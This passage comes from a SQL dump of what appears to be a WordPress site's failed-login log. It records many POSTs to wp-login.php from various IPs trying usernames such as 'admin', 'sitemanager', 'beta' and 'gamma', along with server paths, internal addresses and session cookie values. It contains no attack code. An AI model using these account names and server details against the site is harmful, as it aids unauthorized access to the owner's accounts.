00:00:00'),(95499,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59980\";s:11:\"REMOTE_ADDR\";s:12:\"188.213.66.6\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746964678.007226;s:12:\"REQUEST_TIME\";i:1746964678;}}','188.213.66.6',0,'2025-05-11 17:27:59','1970-01-01 00:00:00'),(95500,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37768\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.114.110\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746965086.1167071;s:12:\"REQUEST_TIME\";i:1746965086;}}','198.54.114.110',0,'2025-05-11 17:34:47','1970-01-01 00:00:00'),(95501,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36452\";s:11:\"REMOTE_ADDR\";s:13:\"51.81.182.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746965491.8582051;s:12:\"REQUEST_TIME\";i:1746965491;}}','51.81.182.241',0,'2025-05-11 17:41:33','1970-01-01 00:00:00'),(95502,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50616\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.229.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746965902.5768909;s:12:\"REQUEST_TIME\";i:1746965902;}}','162.0.229.219',0,'2025-05-11 17:48:24','1970-01-01 00:00:00'),(95503,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34312\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746966716.139132;s:12:\"REQUEST_TIME\";i:1746966716;}}','23.239.27.53',0,'2025-05-11 18:01:57','1970-01-01 00:00:00'),(95504,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46214\";s:11:\"REMOTE_ADDR\";s:13:\"80.248.226.94\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746967534.4990449;s:12:\"REQUEST_TIME\";i:1746967534;}}','80.248.226.94',0,'2025-05-11 18:15:36','1970-01-01 00:00:00'),(95505,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:39:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:23:\"/wp-login.php?wp_lang=e\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_COOKIE\";s:182:\"_jwp=1; wp_lang=e; _uid=fwAAAWggzlWe+hm1A2kvAg==; PHPSESSID=aaf4347179546f286812345d98013013; wordpress_test_cookie=WP%20Cookie%20check; swpm_session=b90c373906a8fc1ba0c861c905924a8f\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"none\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"141\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"198.98.51.24\";s:14:\"HTTP_X_REAL_IP\";s:12:\"198.98.51.24\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:12:\"198.98.51.24\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"141\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:9:\"wp_lang=e\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746980438.0665419;s:12:\"REQUEST_TIME\";i:1746980438;}}','198.98.51.24',0,'2025-05-11 21:50:39','1970-01-01 00:00:00'),(95506,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:39:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:23:\"/wp-login.php?wp_lang=e\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_COOKIE\";s:182:\"_jwp=1; wp_lang=e; _uid=fwAAAWggzl2e+hm1A2kyAg==; PHPSESSID=c797897a3df4b253dea8ece243a2b6c8; wordpress_test_cookie=WP%20Cookie%20check; swpm_session=487d732f0bd6f1e831b9b5005afe3e6b\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"none\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"135\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"198.98.51.24\";s:14:\"HTTP_X_REAL_IP\";s:12:\"198.98.51.24\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:12:\"198.98.51.24\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"135\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:9:\"wp_lang=e\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746980445.9793961;s:12:\"REQUEST_TIME\";i:1746980445;}}','198.98.51.24',0,'2025-05-11 21:50:47','1970-01-01 00:00:00'),(95507,0,'a:2:{s:8:\"username\";s:1:\"a\";s:6:\"server\";a:39:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:23:\"/wp-login.php?wp_lang=e\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_COOKIE\";s:182:\"_jwp=1; wp_lang=e; _uid=fwAAAWggzmWfuhm2A9w/Ag==; PHPSESSID=7cd14df7564c5ce9bb15272e805b1fcf; wordpress_test_cookie=WP%20Cookie%20check; swpm_session=d1f761c4b3b066c06c51f50e355e279a\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"none\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"198.98.51.24\";s:14:\"HTTP_X_REAL_IP\";s:12:\"198.98.51.24\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:12:\"198.98.51.24\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:9:\"wp_lang=e\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746980453.871228;s:12:\"REQUEST_TIME\";i:1746980453;}}','198.98.51.24',0,'2025-05-11 21:50:55','1970-01-01 00:00:00'),(95508,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:39:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:23:\"/wp-login.php?wp_lang=e\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_COOKIE\";s:182:\"_jwp=1; wp_lang=e; _uid=fwAAAWggzmufuhm2A9xFAg==; PHPSESSID=62e41fc345f4b47a037ecf8846931a07; wordpress_test_cookie=WP%20Cookie%20check; swpm_session=7b4e8063bc2b653ba65f47f8a54d04f7\";s:15:\"HTTP_USER_AGENT\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"none\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"128\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"198.98.51.24\";s:14:\"HTTP_X_REAL_IP\";s:12:\"198.98.51.24\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:12:\"198.98.51.24\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"128\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:9:\"wp_lang=e\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746980459.8496289;s:12:\"REQUEST_TIME\";i:1746980459;}}','198.98.51.24',0,'2025-05-11 21:51:01','1970-01-01 00:00:00'),(95509,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:39:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:23:\"/wp-login.php?wp_lang=e\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_COOKIE\";s:182:\"_jwp=1; wp_lang=e; _uid=fwAAAWggznGe+hm1A2k/Ag==; PHPSESSID=8069a236743b0c499a7acb1052e82a6a; wordpress_test_cookie=WP%20Cookie%20check; 